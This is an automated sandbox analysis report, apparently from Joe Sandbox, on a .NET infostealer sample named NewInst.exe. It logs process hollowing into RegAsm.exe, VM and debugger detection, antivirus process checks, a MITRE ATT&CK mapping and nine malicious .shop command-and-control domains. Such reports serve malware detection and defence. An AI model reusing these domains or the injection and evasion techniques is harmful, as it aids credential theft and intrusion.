    Source: NewInst.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/6@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E490 CoCreateInstance,2_2_0042E490
    Source: C:\Users\user\Desktop\NewInst.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NewInst.exe.logJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
    Source: C:\Users\user\Desktop\NewInst.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7640
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\79838862-007c-43c3-9ff5-37aea44012dfJump to behavior
    Source: NewInst.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: NewInst.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\NewInst.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: NewInst.exeReversingLabs: Detection: 52%
    Source: unknownProcess created: C:\Users\user\Desktop\NewInst.exe "C:\Users\user\Desktop\NewInst.exe"
    Source: C:\Users\user\Desktop\NewInst.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\NewInst.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764
    Source: C:\Users\user\Desktop\NewInst.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: NewInst.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: NewInst.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: NewInst.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb source: NewInst.exe
    Source: Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb0j source: NewInst.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043C808 push eax; retf 0041h2_2_0043C809
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043E828 push 4E0042BBh; retf 2_2_0043E82D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043C89E push eax; retf 0041h2_2_0043C8AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004270A2 push eax; mov dword ptr [esp], eax2_2_00427076
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043ABDC push edi; retf 0040h2_2_0043ABDD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043ABE0 push eax; retf 0040h2_2_0043ABF5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043AC08 push eax; retf 2_2_0043AC09
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043ADE8 push esi; retf 2_2_0043ADE9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043E69C pushad ; iretd 2_2_0043E69D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043C750 push eax; retf 0041h2_2_0043C751
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043C754 push eax; retf 0041h2_2_0043C755
    Source: NewInst.exeStatic PE information: section name: .text entropy: 7.992976484719213
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory allocated: 21B0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory allocated: 23A0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory allocated: 43A0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exe TID: 7632Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7656Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\NewInst.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1940966413.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1940966413.0000000000A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-12095
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042F000 LdrInitializeThunk,2_2_0042F000
    Source: C:\Users\user\Desktop\NewInst.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\NewInst.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeCode function: 0_2_023A2499 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_023A2499
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
    Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: froytnewqowv.shop
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 437000Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43A000Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 449000Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 733008Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\NewInst.exeQueries volume information: C:\Users\user\Desktop\NewInst.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: NewInst.exe, 00000000.00000002.1667455325.00000000007F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: NewInst.exe, 00000000.00000002.1667455325.00000000007F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    411
    Process Injection
    1
    Masquerading
    OS Credential Dumping21
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory41
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol2
    Clipboard Data
    2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
    Virtualization/Sandbox Evasion
    Security Account Manager22
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared Drive113
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
    Process Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
    Obfuscated Files or Information
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
    Software Packing
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    NewInst.exe53%ReversingLabsByteCode-MSIL.Ransomware.RedLine
    NewInst.exe100%AviraHEUR/AGEN.1352702
    NewInst.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://upx.sf.net0%URL Reputationsafe
    evoliutwoqm.shop0%Avira URL Cloudsafe
    millyscroqwp.shop100%Avira URL Cloudmalware
    stamppreewntnq.shop100%Avira URL Cloudphishing
    condedqpwqm.shop100%Avira URL Cloudphishing
    https://froytnewqowv.shop/100%Avira URL Cloudphishing
    https://froytnewqowv.shop/apiv100%Avira URL Cloudphishing
    caffegclasiqwp.shop100%Avira URL Cloudmalware
